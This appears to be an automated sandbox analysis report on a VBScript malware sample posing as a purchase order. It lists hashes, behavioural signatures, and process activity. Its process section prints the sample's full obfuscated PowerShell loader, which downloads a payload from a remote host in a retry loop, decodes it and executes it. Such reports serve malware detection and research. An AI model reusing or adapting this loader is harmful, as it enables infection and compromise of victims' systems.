Analysis
-
max time kernel
146s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
02-07-2024 01:47
Static task
static1
Behavioral task
behavioral1
Sample
TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs
Resource
win10v2004-20240611-en
General
-
Target
TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs
-
Size
22KB
-
MD5
003c272edd6f7cf2b08bfc98d1d48c7c
-
SHA1
a6ee590e3b81dbbce6e550c6dba9256c76cd4e21
-
SHA256
78e63f6cc614c9dcc77c0c6b8fc6088ce89533d7c05b66b7732904ad6bc886d6
-
SHA512
4a251916c7e5bef128493ca4f9c303288d9f5934f763f5c383ebf99a671686359cacd977913260ed1c6a3c2e4df36a57873bf4620f7395a70d7eb1b82deb3213
-
SSDEEP
384:clzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgww5Bpg3KU7a4i:ozSR022X/523S0e8xPPmKpgY4Rr0j
Malware Config
Signatures
-
Blocklisted process makes network request 64 IoCs
Processes:
powershell.exeflow pid process 5 2652 powershell.exe 6 2652 powershell.exe 7 2652 powershell.exe 8 2652 powershell.exe 9 2652 powershell.exe 10 2652 powershell.exe 11 2652 powershell.exe 12 2652 powershell.exe 13 2652 powershell.exe 14 2652 powershell.exe 15 2652 powershell.exe 16 2652 powershell.exe 17 2652 powershell.exe 18 2652 powershell.exe 19 2652 powershell.exe 20 2652 powershell.exe 21 2652 powershell.exe 22 2652 powershell.exe 23 2652 powershell.exe 24 2652 powershell.exe 25 2652 powershell.exe 26 2652 powershell.exe 27 2652 powershell.exe 28 2652 powershell.exe 29 2652 powershell.exe 30 2652 powershell.exe 31 2652 powershell.exe 32 2652 powershell.exe 33 2652 powershell.exe 34 2652 powershell.exe 35 2652 powershell.exe 36 2652 powershell.exe 37 2652 powershell.exe 38 2652 powershell.exe 39 2652 powershell.exe 40 2652 powershell.exe 41 2652 powershell.exe 42 2652 powershell.exe 43 2652 powershell.exe 44 2652 powershell.exe 45 2652 powershell.exe 46 2652 powershell.exe 47 2652 powershell.exe 48 2652 powershell.exe 49 2652 powershell.exe 50 2652 powershell.exe 51 2652 powershell.exe 52 2652 powershell.exe 53 2652 powershell.exe 54 2652 powershell.exe 55 2652 powershell.exe 56 2652 powershell.exe 57 2652 powershell.exe 58 2652 powershell.exe 59 2652 powershell.exe 60 2652 powershell.exe 61 2652 powershell.exe 62 2652 powershell.exe 63 2652 powershell.exe 64 2652 powershell.exe 65 2652 powershell.exe 66 2652 powershell.exe 67 2652 powershell.exe 68 2652 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2652 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2652 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 2860 wrote to memory of 2652 2860 WScript.exe powershell.exe PID 2860 wrote to memory of 2652 2860 WScript.exe powershell.exe PID 2860 wrote to memory of 2652 2860 WScript.exe powershell.exe PID 2652 wrote to memory of 2472 2652 powershell.exe cmd.exe PID 2652 wrote to memory of 2472 2652 powershell.exe cmd.exe PID 2652 wrote to memory of 2472 2652 powershell.exe cmd.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;Unisexes (Ivywood ' $,g.l otb aRlt:.S k r iFv.eHb oNr dcs t,e o rPi,e rPs.= $ g,l.oSbCa lH: O pGlAs,n i nDgKsAaHf tFeKnFeMn.s + +D% $ SKtSrWuSbQeBlCy dKeUnOe.1 8b7S..cCo uLnSt ') ;$Ascon=$Strubelydene187[$Skrivebordsteoriers];}$Omnivoracity=340878;$Lehrman=25696;Unisexes (Ivywood 'C$ g lSoBb aXlE:,FCi,l tGe,rSa.bIl e, =U KGDe.t -UCDo nUtFe.nAt t$HFLo r mMa sTtIeDl,s e ');Unisexes (Ivywood 'I$.gElDo.b,aPlT:.KCu nPsGtTkPr iFt iFkNe rTeCnBs, I=O [ S yNs t.e,m .FC o.nAv e r tS].: :HFRr oSm BSaPsLeA6R4FSFtSr i,nAgT( $HF iGlRtKeSrVa,b.l eT)R ');Unisexes (Ivywood ' $Cgcl o,bAa,l : USn p uTr.cIh aSs,eHdP ,=T [MS.yDs.tVeCmT. TleAxStP..ESn cRo d i.nIg.] :.: A SUCMI I..RG,eMt SRt r iAn g,(B$BKPu n,sUt k r iPtKi.kGeFrSeKnSs )M ');Unisexes (Ivywood 'C$,g,lDoSb aTlK: HSyTtUt e hRo.lidDsA=K$HU nEpTuHr c h aFsBe d .Ps u.b.sftSr iSnMg.(,$FONm,nPi vKo r a c.iFtEy ,A$PLTeEhMr m a n )B ');Unisexes $Hytteholds;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2652-4-0x000007FEF58CE000-0x000007FEF58CF000-memory.dmpFilesize
4KB
-
memory/2652-5-0x000000001B5B0000-0x000000001B892000-memory.dmpFilesize
2.9MB
-
memory/2652-7-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmpFilesize
9.6MB
-
memory/2652-8-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmpFilesize
9.6MB
-
memory/2652-6-0x0000000002910000-0x0000000002918000-memory.dmpFilesize
32KB
-
memory/2652-9-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmpFilesize
9.6MB
-
memory/2652-10-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmpFilesize
9.6MB
-
memory/2652-11-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmpFilesize
9.6MB
-
memory/2652-12-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmpFilesize
9.6MB
-
memory/2652-13-0x000007FEF58CE000-0x000007FEF58CF000-memory.dmpFilesize
4KB
-
memory/2652-14-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmpFilesize
9.6MB